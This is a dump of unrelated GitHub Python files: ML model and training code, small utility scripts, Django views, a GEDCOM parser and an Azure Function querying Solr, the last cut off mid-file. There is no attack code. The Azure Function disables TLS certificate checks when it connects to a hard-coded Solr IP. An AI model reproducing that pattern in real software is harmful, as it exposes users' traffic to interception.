self.forward(self.input_x1, self.input_x2, self.max_seq_len,\n self.hidden_dropout_keep_prob,\n self.input_dropout_keep_prob,\n self.middle_dropout_keep_prob, reuse=False)\n # Calling loss function\n self.loss = self.get_loss()\n\n # Getting predictions\n self.predictions = self.get_predictions()\n\n def get_loss(self):\n \"\"\"\n Calculate mean cross-entropy loss\n :return:\n \"\"\"\n with tf.name_scope(\"loss\"):\n labels = tf.cast(self.input_y, 'int32')\n if self.viterbi:\n log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(self.unflat_scores, labels,\n self.flat_sequence_lengths,\n transition_params=self.transition_params)\n # self.transition_params = transition_params\n loss = tf.reduce_mean(-log_likelihood)\n else:\n losses = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=self.unflat_scores, labels=labels)\n masked_losses = tf.multiply(losses, self.input_mask)\n loss = tf.div(tf.reduce_sum(masked_losses), tf.reduce_sum(self.input_mask))\n loss += self.l2_penalty * self.l2_loss\n unflat_no_dropout_scores, _ = self.forward(self.input_x1, self.input_x2, self.max_seq_len,\n hidden_dropout_keep_prob=1.0, input_dropout_keep_prob=1.0,\n middle_dropout_keep_prob=1.0)\n drop_loss = tf.nn.l2_loss(tf.subtract(self.unflat_scores, unflat_no_dropout_scores))\n loss += self.drop_penalty * drop_loss\n return loss\n\n def get_predictions(self):\n \"\"\"\n Get prediction scores\n :return:\n \"\"\"\n with tf.name_scope(\"predictions\"):\n if self.viterbi:\n predictions_scores = self.unflat_scores\n else:\n predictions_scores = tf.argmax(self.unflat_scores, 2)\n return predictions_scores\n\n def forward(self, input_x1, input_x2, max_seq_len, hidden_dropout_keep_prob,\n input_dropout_keep_prob, middle_dropout_keep_prob, reuse=True):\n \"\"\"\n Passing the inputs through the forward layer\n :param input_x1:\n :param max_seq_len:\n :param hidden_dropout_keep_prob:\n :param input_dropout_keep_prob:\n :param middle_dropout_keep_prob:\n :param reuse:\n :return:\n \"\"\"\n word_embeddings = tf.nn.embedding_lookup(self.w_e, input_x1)\n with tf.variable_scope(\"forward\", reuse=reuse):\n input_list = [word_embeddings]\n input_size = self.embedding_size\n if self.use_characters:\n input_list.append(self.char_embeddings)\n input_size += self.char_size\n if self.use_shape:\n shape_embeddings_shape = (self.shape_domain_size - 1, self.shape_size)\n w_s = tf_utils.initialize_embeddings(shape_embeddings_shape, name=\"w_s\")\n shape_embeddings = tf.nn.embedding_lookup(w_s, input_x2)\n input_list.append(shape_embeddings)\n input_size += self.shape_size\n\n input_feats = tf.concat(axis=2, values=input_list)\n input_feats_expanded_drop = tf.nn.dropout(input_feats, input_dropout_keep_prob)\n total_output_width = 2 * self.hidden_dim\n with tf.variable_scope(\"bilstm\", reuse=reuse):\n fwd_cell = tf.contrib.rnn.BasicLSTMCell(self.hidden_dim, state_is_tuple=True)\n bwd_cell = tf.contrib.rnn.BasicLSTMCell(self.hidden_dim, state_is_tuple=True)\n lstm_outputs, _ = tf.nn.bidirectional_dynamic_rnn(cell_fw=fwd_cell, cell_bw=bwd_cell, dtype=tf.float32,\n inputs=input_feats_expanded_drop,\n parallel_iterations=50,\n sequence_length=self.flat_sequence_lengths)\n hidden_outputs = tf.concat(axis=2, values=lstm_outputs)\n\n h_concat_flat = tf.reshape(hidden_outputs, [-1, total_output_width])\n\n # Add dropout\n with tf.name_scope(\"middle_dropout\"):\n h_drop = tf.nn.dropout(h_concat_flat, middle_dropout_keep_prob)\n\n # second projection\n with tf.name_scope(\"tanh_proj\"):\n w_tanh = tf_utils.initialize_weights([total_output_width, self.hidden_dim], \"w_tanh\",\n init_type=\"xavier\")\n b_tanh = tf.get_variable(initializer=tf.constant(0.01, shape=[self.hidden_dim]), name=\"b_tanh\")\n self.l2_loss += tf.nn.l2_loss(w_tanh)\n self.l2_loss += tf.nn.l2_loss(b_tanh)\n h2_concat_flat = tf.nn.xw_plus_b(h_drop, w_tanh, b_tanh, name=\"h2_tanh\")\n h2_tanh = tf_utils.apply_nonlinearity(h2_concat_flat, self.nonlinearity)\n\n # Add dropout\n with tf.name_scope(\"hidden_dropout\"):\n h2_drop = tf.nn.dropout(h2_tanh, hidden_dropout_keep_prob)\n\n # Final (unnormalized) scores and predictions\n with tf.name_scope(\"output\"):\n w_o = tf_utils.initialize_weights([self.hidden_dim, self.num_classes], \"w_o\", init_type=\"xavier\")\n b_o = tf.get_variable(initializer=tf.constant(0.01, shape=[self.num_classes]), name=\"b_o\")\n self.l2_loss += tf.nn.l2_loss(w_o)\n self.l2_loss += tf.nn.l2_loss(b_o)\n scores = tf.nn.xw_plus_b(h2_drop, w_o, b_o, name=\"scores\")\n unflat_scores = tf.reshape(scores, tf.stack([self.batch_size, max_seq_len, self.num_classes]))\n return unflat_scores, hidden_outputs\n","repo_name":"agankur21/entity_disambiguation","sub_path":"src/models/bilstm.py","file_name":"bilstm.py","file_ext":"py","file_size_in_byte":16396,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"74028147042","text":"import editdistance\nimport time\nimport os\nimport copy\nimport argparse\nimport pdb\nimport collections\nimport sys\n\nimport numpy as np\n\nimport pdb\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom torch.autograd import Variable\nfrom torchvision import datasets, models, transforms\nimport torchvision\n\nimport model\nfrom anchors import Anchors\nimport losses\nfrom dataloader import CSVDataset, collater, Resizer, AspectRatioBasedSampler, Augmenter, UnNormalizer, Normalizer\nfrom torch.utils.data import Dataset, DataLoader\n\nimport csv_eval\nfrom get_transcript import get_transcript\n\nfrom warpctc_pytorch import CTCLoss\n#from torch_baidu_ctc import CTCLoss\n#assert torch.__version__.split('.')[1] == '4'\n\nprint(('CUDA available: {}'.format(torch.cuda.is_available())))\n\n\ndef main(args=None):\n\n parser = argparse.ArgumentParser(description='Simple training script for training a RetinaNet network.')\n\n parser.add_argument('--dataset', help='Dataset type, must be one of csv or coco.',default = \"csv\")\n parser.add_argument('--coco_path', help='Path to COCO directory')\n parser.add_argument('--csv_train', help='Path to file containing training annotations (see readme)')\n parser.add_argument('--csv_classes', help='Path to file containing class list (see readme)',default=\"binary_class.csv\")\n parser.add_argument('--csv_val', help='Path to file containing validation annotations (optional, see readme)')\n\n parser.add_argument('--depth', help='Resnet depth, must be one of 18, 34, 50, 101, 152', type=int, default=18)\n parser.add_argument('--epochs', help='Number of epochs', type=int, default=500)\n parser.add_argument('--epochs_only_det', help='Number of epochs to train detection part', type=int, default=1)\n parser.add_argument('--max_epochs_no_improvement', help='Max epochs without improvement',type=int,default=100)\n parser.add_argument('--pretrained_model', help='Path of .pt file with pretrained model',default = 'esposallescsv_retinanet_0.pt')\n parser.add_argument('--model_out', help='Path of .pt file with trained model to save',default = 'trained')\n\n parser.add_argument('--score_threshold', help='Score above which boxes are kept',type=float,default=0.5)\n parser.add_argument('--nms_threshold', help='Score above which boxes are kept',type=float,default=0.2)\n parser.add_argument('--max_boxes', help='Max boxes to be fed to recognition',default=95)\n parser.add_argument('--seg_level', help='[line, word], to choose anchor aspect ratio',default='word')\n parser.add_argument('--early_stop_crit', help='Early stop criterion, detection (map) or transcription (cer)',default='cer')\n parser.add_argument('--max_iters_epoch', help='Max steps per epoch (for debugging)',default=1000000)\n parser.add_argument('--train_htr',help='Train recognition or not',default='True')\n parser.add_argument('--train_det',help='Train detection or not',default='True')\n parser.add_argument('--htr_gt_box',help='Train recognition branch with box gt (for debugging)',default='False')\n \n parser = parser.parse_args(args)\n\n if parser.dataset == 'csv':\n\n if parser.csv_train is None:\n raise ValueError('Must provide --csv_train')\n\n dataset_name = parser.csv_train.split(\"/\")[-2]\n \n dataset_train = CSVDataset(train_file=parser.csv_train, class_list=parser.csv_classes, transform=transforms.Compose([Normalizer(), Augmenter(), Resizer()]))\n\n if parser.csv_val is None:\n dataset_val = None\n print('No validation annotations provided.')\n else:\n dataset_val = CSVDataset(train_file=parser.csv_val, class_list=parser.csv_classes, transform=transforms.Compose([Normalizer(), Resizer()]))\n\n else:\n raise ValueError('Dataset type not understood (must be csv or coco), exiting.')\n\n # Files for training log\n\n experiment_id =str(time.time()).split('.')[0]\n valid_cer_f=open(experiment_id+'_valid_CER.txt','w')\n for arg in vars(parser):\n if getattr(parser, arg) is not None:\n valid_cer_f.write(str(arg)+' '+str(getattr(parser, arg))+'\\n')\n valid_cer_f.close()\n\n\n \n sampler = AspectRatioBasedSampler(dataset_train, batch_size=1,drop_last=False)\n dataloader_train = DataLoader(dataset_train, num_workers=3, collate_fn=collater, batch_sampler=sampler)\n \n if dataset_val is not None:\n sampler_val = AspectRatioBasedSampler(dataset_val, batch_size=1, drop_last=False)\n dataloader_val = DataLoader(dataset_val, num_workers=0, collate_fn=collater, batch_sampler=sampler_val)\n\n if not os.path.exists('trained_models'):\n os.mkdir('trained_models')\n\n # Create the model\n \n train_htr = parser.train_htr=='True'\n htr_gt_box = parser.htr_gt_box=='True'\n torch.backends.cudnn.benchmark= False \n \n\n alphabet=dataset_train.alphabet\n if os.path.exists(parser.pretrained_model):\n retinanet = torch.load(parser.pretrained_model)\n else:\n if parser.depth == 18:\n retinanet = model.resnet18(\n num_classes=dataset_train.num_classes(), \n pretrained=True,\n max_boxes=int(parser.max_boxes),\n score_threshold=float(parser.score_threshold),\n seg_level=parser.seg_level,\n alphabet=alphabet,\n train_htr=train_htr,\n htr_gt_box=htr_gt_box)\n\n elif parser.depth == 34:\n\n retinanet = model.resnet34(\n num_classes=dataset_train.num_classes(), \n pretrained=True,\n max_boxes=int(parser.max_boxes),\n score_threshold=float(parser.score_threshold),\n seg_level=parser.seg_level,\n alphabet=alphabet,\n train_htr=train_htr,\n htr_gt_box=htr_gt_box)\n\n elif parser.depth == 50:\n retinanet = model.resnet50(num_classes=dataset_train.num_classes(), pretrained=True)\n elif parser.depth == 101:\n retinanet = model.resnet101(num_classes=dataset_train.num_classes(), pretrained=True)\n elif parser.depth == 152:\n retinanet = model.resnet152(num_classes=dataset_train.num_classes(), pretrained=True)\n else:\n raise ValueError('Unsupported model depth, must be one of 18, 34, 50, 101, 152') \n\n use_gpu = True\n train_htr=parser.train_htr=='True'\n train_det=parser.train_det=='True'\n retinanet.htr_gt_box=parser.htr_gt_box=='True'\n\n retinanet.train_htr=train_htr\n retinanet.epochs_only_det = parser.epochs_only_det\n\n if use_gpu:\n retinanet = retinanet.cuda()\n \n retinanet = torch.nn.DataParallel(retinanet).cuda()\n \n retinanet.training = True\n \n \n\n optimizer = optim.Adam(retinanet.parameters(), lr=1e-4)\n\n scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, patience=50, verbose=True)\n\n loss_hist = collections.deque(maxlen=500)\n ctc = CTCLoss()\n retinanet.train()\n retinanet.module.freeze_bn()\n \n best_cer = 1000\n best_map = 0\n epochs_no_improvement=0\n verbose_each=1\n optimize_each =1\n print(('Num training images: {}'.format(len(dataset_train))))\n\n \n\n\n for epoch_num in range(parser.epochs):\n cers=[]\n\n retinanet.training=True\n\n retinanet.train()\n retinanet.module.freeze_bn()\n \n epoch_loss = []\n \n for iter_num, data in enumerate(dataloader_train):\n if iter_num>int(parser.max_iters_epoch): break\n try:\n if iter_num % optimize_each==0:\n optimizer.zero_grad()\n (classification_loss, regression_loss,ctc_loss,ner_loss) = retinanet([data['img'].cuda().float(), data['annot'],ctc,epoch_num])\n\n classification_loss = classification_loss.mean()\n regression_loss = regression_loss.mean()\n if train_det: \n\n if train_htr:\n loss = ctc_loss+ classification_loss+regression_loss+ner_loss\n\n else:\n loss = classification_loss+regression_loss\n \n elif train_htr:\n loss = ctc_loss\n\n else:\n continue\n if bool(loss == 0):\n continue\n loss.backward()\n torch.nn.utils.clip_grad_norm_(retinanet.parameters(), 0.1)\n if iter_num % verbose_each==0:\n print(('Epoch: {} | Step: {} |Classification loss: {:1.5f} | Regression loss: {:1.5f} | CTC loss: {:1.5f} | NER loss: {:1.5f} | Running loss: {:1.5f} | Total loss: {:1.5f}\\r'.format(epoch_num,iter_num, float(classification_loss), float(regression_loss),float(ctc_loss),float(ner_loss),np.mean(loss_hist),float(loss),\"\\r\")))\n torch.cuda.empty_cache() \n\n optimizer.step()\n\n loss_hist.append(float(loss))\n\n epoch_loss.append(float(loss))\n\n \n except Exception as e:\n print(e)\n continue\n if parser.dataset == 'csv' and parser.csv_val is not None and train_det:\n\n print('Evaluating dataset')\n\n mAP = csv_eval.evaluate(dataset_val, retinanet,score_threshold=parser.score_threshold)\n mAP=float(mAP[0][0]) \n\n retinanet.eval()\n retinanet.training=False \n retinanet.score_threshold = float(parser.score_threshold) \n for idx,data in enumerate(dataloader_val):\n if idx>int(parser.max_iters_epoch): break\n print(\"Eval CER on validation set:\",idx,\"/\",len(dataset_val),\"\\r\")\n image_name = dataset_val.image_names[idx].split('/')[-1].split('.')[-2]\n\n #generate_pagexml(image_name,data,retinanet,parser.score_threshold,parser.nms_threshold,dataset_val)\n text_gt = dataset_val.image_names[idx].split('.')[0]+'.txt'\n f =open(text_gt,'r')\n text_gt_lines=f.readlines()[0]\n transcript_pred = get_transcript(image_name,data,retinanet,float(parser.score_threshold),float(parser.nms_threshold),dataset_val,alphabet)\n cers.append(float(editdistance.eval(transcript_pred,text_gt_lines))/len(text_gt_lines))\n\n t=str(time.time()).split('.')[0]\n\n valid_cer_f=open(experiment_id+'_valid_CER.txt','a')\n valid_cer_f.write(str(epoch_num)+\" \"+str(np.mean(cers))+\" \"+t+'\\n')\n valid_cer_f.close()\n print(\"GT\",text_gt_lines)\n print(\"PREDS SAMPLE:\",transcript_pred)\n \n\n if parser.early_stop_crit=='cer':\n\n if float(np.mean(cers))<float(best_cer): \n best_cer=np.mean(cers)\n epochs_no_improvement=0\n torch.save(retinanet.module, 'trained_models/'+parser.model_out+'{}_retinanet.pt'.format(parser.dataset))\n else: epochs_no_improvement+=1\n elif parser.early_stop_crit=='map':\n if mAP>best_map:\n best_map=mAP \n epochs_no_improvement=0\n torch.save(retinanet.module, 'trained_models/'+parser.model_out+'{}_retinanet.pt'.format(parser.dataset))\n \n else: epochs_no_improvement+=1\n if train_det:\n print(epoch_num,\"mAP: \",mAP,\" best mAP\",best_map)\n if train_htr:\n print(\"VALID CER:\",np.mean(cers),\"best CER\",best_cer) \n print(\"Epochs no improvement:\",epochs_no_improvement)\n if epochs_no_improvement>3:\n for param_group in optimizer.param_groups:\n if param_group['lr']>10e-5:\n param_group['lr']*=0.1\n \n if epochs_no_improvement>=parser.max_epochs_no_improvement:\n print(\"TRAINING FINISHED AT EPOCH\",epoch_num,\".\")\n sys.exit()\n \n scheduler.step(np.mean(epoch_loss)) \n torch.cuda.empty_cache() \n \n\n retinanet.eval()\n\n #torch.save(retinanet, 'model_final.pt'.format(epoch_num))\n\nif __name__ == '__main__':\n main()\n","repo_name":"kapitsa2811/research-e2e-pagereader","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":12168,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"5907053097","text":"#!/usr/bin/env python3\n# rdainfo.py - report a piece of rda-related info, use --help for details\n# Both a command line utility and a Python utility module.\n\nimport os\nimport sys\nimport argparse\nimport os.path as path\n\ndef top(unknown=False, **kwargs):\n d = os.getcwd()\n while True:\n if path.isdir(path.join(d, 'build')):\n return d\n parent = path.dirname(d)\n if parent == d:\n if unknown:\n return 'unknown'\n raise Exception('Not in an RDA sandbox.')\n d = parent\n\ndef host(unknown=False, **kwargs):\n if sys.platform.startswith('linux'):\n return 'linux'\n if sys.platform.startswith('win'):\n return 'windows'\n if sys.platform.startswith('darwin'):\n return 'osx'\n if unknown:\n return 'unknown'\n raise Exception('Unknown host: ' + sys.platform)\n\nif __name__ == '__main__':\n\n # Parse arguments\n\n parser = argparse.ArgumentParser(\n description='Report RDA-related information.')\n parser.add_argument('--top', action='store_true',\n help='Report the root of the sandbox containing the current directory.')\n parser.add_argument('--host', action='store_true',\n help='Report the host type running this program:'\n ' linux, windows, or osx.')\n parser.add_argument('--all', action='store_true',\n help='Report all items, with labels. Implies --unknown.')\n parser.add_argument('--unknown', action='store_true',\n help='Print \\'unknown\\' instead of raising exceptions.')\n parser.add_argument('--debug', action='store_true',\n help='Debug this script: print extra crap.')\n args = parser.parse_args()\n\n # Process the arguments\n if args.debug:\n print(args)\n if args.all:\n args.unknown = True\n print('top:', top(**args.__dict__))\n print('host:', host(**args.__dict__))\n else:\n if args.top:\n print(top(**args.__dict__))\n if args.host:\n print(host(**args.__dict__))\n\n","repo_name":"lros/rda","sub_path":"bin/rdainfo.py","file_name":"rdainfo.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73857730721","text":"from django.shortcuts import render, redirect\nfrom .forms import UserForm\nfrom .usecases import *\nfrom django.contrib import messages\n# Create your views here.\ndef index(request):\n return render(request, 'main/index.html')\n\ndef registration(request):\n if request.method == 'POST':\n form = UserForm(request.POST)\n if form.is_valid():\n username = form.cleaned_data['username']\n messages.success(request,\n f\"Welcome to our site {username}!\")\n form.save(commit=True)\n return redirect('login')\n else:\n messages.error(request,\n \"Please correct the errors below.\")\n context = {'form': form}\n return render(request, 'registration/create_user.html', context)\n\n context = {'form': UserForm()}\n return render(request, 'registration/create_user.html', context)\n\ndef about(request):\n return render(request, 'main/about.html')","repo_name":"Elhsan/AKFA","sub_path":"Akfa_project/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"44155716614","text":"# Kirk Vasilas\n# adapted from Ryan Tom\n# python3.5\n# to run call tag_parse.read_file('./proj02test.ged')\n\ndef strip_line(ged_line):\n return ged_line.strip('\\n').split(\" \")\n\n\ndef validate(line):\n zero_tags = [\"INDI\", \"FAM\", \"HEAD\", \"TRLR\", \"NOTE\"]\n one_tags = [\"NAME\", \"SEX\", \"BIRT\", \"DEAT\", \"FAMC\",\n \"FAMS\", \"MARR\", \"HUSB\", \"WIFE\", \"CHIL\", \"DIV\"]\n two_tags = [\"DATE\"]\n\n level = line.pop(0)\n tag = line.pop(0)\n args = \" \".join(line)\n status = False\n\n if (tag == \"INDI\" or tag == \"FAM\"):\n status = False\n\n if ((args in zero_tags) or (args in one_tags) or (args in two_tags)):\n temp = tag\n tag = args\n args = temp\n if ((level == \"0\") and (tag in zero_tags)):\n status = True\n elif ((level == \"1\") and (tag in one_tags)):\n status = True\n elif ((level == \"2\") and (tag in two_tags)):\n status = True\n return(status, tag, args)\n\n\ndef read_file(path):\n file = open(path)\n ged_lines=file.readlines()\n person_date_tags = [\"BIRT\", \"DEAT\"]\n fam_date_tags= [\"MARR\",\"DIV\"]\n fam_flag=False\n date_type=''\n people={}\n curr_id = \"\"\n families={}\n for ged_line in ged_lines:\n status, tag, args = validate(strip_line(ged_line))\n if(status == True):\n if(tag == \"INDI\"):\n curr_id = args\n if curr_id in people:\n people[curr_id][\"isDuplicate\"] = True\n else:\n people[curr_id] = {}\n people[curr_id][\"ID\"] = args\n fam_flag = False\n\n if(tag == \"NAME\" or tag == \"SEX\"):\n people[curr_id][tag] = args\n\n if(tag in person_date_tags):\n date_type = tag\n if(tag == \"DATE\"):\n if(fam_flag == False):\n people[curr_id][date_type] = args\n else:\n families[curr_id][date_type] = args\n\n if(tag == \"FAM\"):\n curr_id = args\n fam_flag = True\n if curr_id in families:\n families[curr_id][\"isDuplicate\"] = True\n else:\n families[curr_id] = {}\n families[curr_id][\"ID\"] = args\n\n if(tag in fam_date_tags):\n date_type = tag\n if(tag == \"HUSB\" or tag == \"WIFE\"):\n families[curr_id][tag]=args\n if(tag == \"CHIL\"):\n if( tag not in families[curr_id].keys() ):\n families[curr_id][tag] = [args]\n else:\n families[curr_id][tag].append(args)\n\n file.close\n return(people, families)\n\n #old do not delete its good reference for now\n # print(people, families, sep='\\n')\n # print(people.keys())\n # print(people['rn'].keys())\n # print(\"\\n### Individuals ###\")\n # for key in people:\n # print(\"id =\",people[key]['ID'], \"| name =\", people[key]['NAME'], sep=' ')\n # print(\"\\n\\n### Families ###\")\n # for key in families:\n # print(\"\\nFamily =\",families[key]['ID'], sep=' ')\n # print(\"Husband => id =\", families[key]['HUSB'],\"| Name =\",people[families[key]['HUSB']]['NAME'] )\n # print(\"Wife => id =\", families[key]['WIFE'],\"| Name =\", people[families[key]['WIFE']]['NAME'])\n\n#read_file('./proj02test.ged')\n#read_file('./targ.ged')\n","repo_name":"kvasilas/CS555ws","sub_path":"tag_parse.py","file_name":"tag_parse.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33051361648","text":" # -*- coding: utf-8 -*-\r\n#This scipt contain sample codes for encoding support in Beautiful Soup\r\nfrom bs4 import BeautifulSoup\r\n\r\n#without encoding specified\r\n\r\nhtml_markup = \"\"\"<p> The Spanish language is written using the Spanish alphabet, which is the Latin alphabet with one additional letter, eñe ?ñ?, for a total of 27 letters.</p>\r\n\"\"\"\r\nsoup = BeautifulSoup(html_markup,\"lxml\")\r\nprint(soup.p.string)\r\n\r\n#with utf-8\r\n\r\nsoup = BeautifulSoup(html_markup,\"lxml\",from_encoding=\"utf-8\")\r\nprint(soup.prettify())\r\n\r\n#with latin-1\r\nsoup = BeautifulSoup(html_markup,\"lxml\",from_encoding=\"latin-1\")\r\nprint(soup.prettify())\r\n\r\n#original encoding\r\n\r\nhtml_markup = \"\"\"\r\n<html>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html;charset=ISO8859-2\"/>\r\n<p>cédille (from French), is a hook or tail ( ž ) added under certain letters as a diacritical mark to modify their pronunciation\r\n</p>\"\"\"\r\nsoup = BeautifulSoup(html_markup,\"lxml\") \r\nprint(soup.original_encoding)\r\n\r\n\r\n#using specific encoding in output\r\n\r\nprint(soup.prettify(\"ISO8859-2\"))\r\n\r\n#using encode\r\n\r\nprint(soup.p.encode())\r\n\r\n\r\n#encode using specific encoding \r\n\r\nprint(soup.encode(\"ISO-8859-2\"))\r\n","repo_name":"tasdikrahman/srm_search_engine","sub_path":"beautiful_soup_guide/9554_06.py","file_name":"9554_06.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"15941261440","text":"nombre=input(\"Digite su nombre:\")\na=0\nwhile a==0:\n edad=int(input(\"Digite su edad:\"))\n if edad>0 and edad<18:\n valorC=30000\n tipo=\"Juvenil\"\n a+=1\n elif edad>=18 and edad<=100:\n valorC=45000\n tipo=\"Adulto\"\n a+=1\n else:\n print(\"Esa edad no es válida\")\n print(\"\")\ncantidad=int(input(\"Digite la cantidad de camisetas a comprar:\"))\ntotal=valorC*cantidad\nprint(\"\")\nprint(\"NOMBRE:\",nombre)\nprint(\"TIPO CAMISETA:\",tipo)\nprint(\"TOTAL A PAGAR:\",total)\n","repo_name":"Juan-C13/Venta-de-camisetas","sub_path":"02 Instruccion if - else.py","file_name":"02 Instruccion if - else.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26606818234","text":"import logging\nimport json\nimport azure.functions as func\nimport pandas as pd\n# from postAllProducts import views\nimport os \nimport pysolr\n\nsolr_url_config=\"https://52.152.191.13:8983/solr\"\nsolr_product= pysolr.Solr(solr_url_config+\"/product_information/\", timeout=10,verify=False)\nsolr_notification_status=pysolr.Solr(solr_url_config+'/sap_notification_status/', timeout=10,verify=False)\nsolr_unstructure_data=pysolr.Solr(solr_url_config+'/unstructure_processed_data/', timeout=10,verify=False)\nsolr_document_variant=pysolr.Solr(solr_url_config+'/sap_document_variant/', timeout=10,verify=False)\nsolr_ghs_labeling_list_data=pysolr.Solr(solr_url_config+'/sap_ghs_labeling_list_data/', timeout=10,verify=False)\nproduct_column = [\"TYPE\",\"TEXT1\",\"TEXT2\",\"TEXT3\",\"TEXT4\",\"SUBCT\"]\nsolr_product_column = \",\".join(product_column)\n\ndef main(req: func.HttpRequest) -> func.HttpResponse:\n try:\n logging.info('postBasicProperties function processing a request.')\n result=[]\n req_body = req.get_json() \n basic_details=get_basic_properties_details(req_body)\n result = json.dumps(basic_details)\n except Exception as e:\n logging.error(str(e))\n return func.HttpResponse(result,mimetype=\"application/json\")\n\ndef querying_solr_data(query,params):\n try:\n df_product_combine=pd.DataFrame() \n response = solr_product.search(query,**params)\n result = json.dumps(list(response))\n df_product_combine=pd.read_json(result,dtype=str)\n if len(df_product_combine.columns)!=len(product_column):\n dummy=pd.DataFrame([],columns=product_column)\n df_product_combine=pd.concat([df_product_combine,dummy]).fillna(\"-\")\n df_product_combine=df_product_combine.fillna(\"-\")\n return df_product_combine\n except Exception as e:\n return df_product_combine\n\ndef basic_spec_constructor(req_body):\n try:\n last_specid=''\n namlist=[]\n synlist=[]\n speclist_data=[]\n spec_body=req_body\n spec_list=[]\n for item in spec_body: \n spec_details=item.get(\"name\").split(\" | \")\n spec_list.append(spec_details[0])\n spec_list=list(set(spec_list))\n product_spec=[data.replace(\" \",\"\\ \") for data in spec_list]\n spec_query=\" || \".join(product_spec)\n params={\"rows\":2147483647,\"fl\":solr_product_column}\n query=f'TYPE:NAMPROD && SUBCT:REAL_SUB && TEXT2:({spec_query})'\n specdetails=list(solr_product.search(query,**params))\n for data in specdetails:\n spec_id=data.get(\"TEXT2\",\"-\")\n if (last_specid!=spec_id) and last_specid!='':\n namlist=list(set(namlist))\n synlist=list(set(synlist))\n namstr=\",\".join(namlist)\n synstr=\", \".join(synlist)\n speclist_data.append([last_specid,namstr,synstr]) \n namlist=[]\n synlist=[]\n dat_nam=data.get(\"TEXT1\",\"\")\n dat_syn=data.get(\"TEXT3\",\"\")\n namlist.append(dat_nam)\n synlist.append(dat_syn)\n else: \n dat_nam=data.get(\"TEXT1\",\"\")\n dat_syn=data.get(\"TEXT3\",\"\")\n namlist.append(dat_nam)\n synlist.append(dat_syn) \n last_specid = spec_id \n namlist=list(set(namlist))\n synlist=list(set(synlist))\n namstr=\",\".join(namlist)\n synstr=\", \".join(synlist)\n speclist_data.append([last_specid,namstr,synstr]) \n return speclist_data\n except Exception as e:\n return speclist_data\n\ndef get_material_details_on_selected_spec(product_rspec,params):\n try:\n query=f'TYPE:MATNBR && TEXT2:{product_rspec}'\n matinfo=solr_product.search(query,**params)\n matstr=[]\n bdt_list=[]\n material_list=[]\n material_details=[]\n desc_list=[]\n for i in list(matinfo):\n bdt=str(i.get(\"TEXT3\")).strip()\n bdt_list.append(bdt)\n matnumber=str(i.get(\"TEXT1\"))\n material_list.append(matnumber)\n desc=str(i.get(\"TEXT4\"))\n desc_list.append(desc)\n matjson={\n \"bdt\":bdt,\n \"material_number\":matnumber,\n \"description\":desc,\n }\n if bdt:\n bstr=bdt+\" - \"+matnumber+\" - \"+desc\n matstr.append(bstr)\n material_details.append(matjson)\n material_list=list(set(material_list))\n bdt_list=list(set(bdt_list))\n return material_list,bdt_list,desc_list,matstr,material_details\n except Exception as e:\n return [],[],[],[],[]\n\ndef get_cas_details_on_selected_spec(product_rspec,params):\n try:\n cas_list=[]\n query=f'TYPE:SUBIDREL && TEXT2:{product_rspec}'\n temp_df=querying_solr_data(query,params) \n column_value = list(temp_df[\"TEXT1\"].unique())\n product_cas=[data.replace(\" \",\"\\ \") for data in column_value]\n cas_query=\" || \".join(product_cas)\n params={\"rows\":2147483647,\"fl\":solr_product_column}\n query=f'TYPE:NUMCAS && SUBCT:(PURE_SUB || REAL_SUB) && TEXT2:({cas_query})'\n casdetails=list(solr_product.search(query,**params))\n return casdetails\n except Exception as e:\n return cas_list\n\ndef get_basic_properties_details(req_body):\n try:\n speclist_data = basic_spec_constructor(req_body)\n product_level_details=[]\n material_level_details=[]\n cas_level_details=[]\n product_level_dict={}\n material_level_dict={}\n cas_level_dict={}\n for specid,namprod,synonyms in speclist_data:\n product_level_dict[\"specId\"]=specid\n product_level_dict[\"prodIdentifiers\"]=namprod\n product_level_dict[\"synonyms\"]=synonyms\n params={\"rows\":2147483647,\"fl\":\"TEXT1,TEXT2,TEXT3,TEXT4\"}\n material_list,bdt_list,desc_list,matstr,material_details=get_material_details_on_selected_spec(specid,params)\n len_active_mat=0\n for data in desc_list:\n if data[0] !='^':\n len_active_mat+=1\n # year=[]\n # kg=0\n # check_material=list(set(material_list))\n # material_dump=[data.replace(\" \",\"\\ \") for data in check_material]\n # material_query=\" || \".join(material_dump)\n # query=f'CATEGORY:SAP-BW && IS_RELEVANT:1 && PRODUCT:({material_query})'\n # params={\"rows\":2147483647,\"fl\":\"DATA_EXTRACT,CATEGORY,PRODUCT\"}\n # salesinfo=list(solr_unstructure_data.search(query,**params))\n # matlist_kg={}\n # matkg=0\n # last_mat=''\n # for data in salesinfo:\n # material_number=data.get(\"PRODUCT\",\"-\") \n # datastr=json.loads(data.get(\"DATA_EXTRACT\"))\n # soldyear=str(datastr.get(\"Fiscal year/period\",\"-\"))\n # kg=kg+int(datastr.get(\"SALES KG\",0))\n # if last_mat!=material_number and last_mat!='':\n # matlist_kg[last_mat]=matkg\n # matkg=0 \n # else:\n # matkg+=int(datastr.get(\"SALES KG\",0)) \n # soldyear=soldyear.split(\".\")\n # if len(year)>1:\n # year.append(int(soldyear[1]))\n # last_mat=material_number\n # matlist_kg[last_mat]=matkg\n # year.sort()\n product_level_dict[\"no_Active_Materials\"]=len_active_mat\n # if len(year)>1:\n # product_level_dict[\"sales_Year\"]=str(year[0])+\" TO \"+str(year[-1])\n # elif len(year)==1:\n # 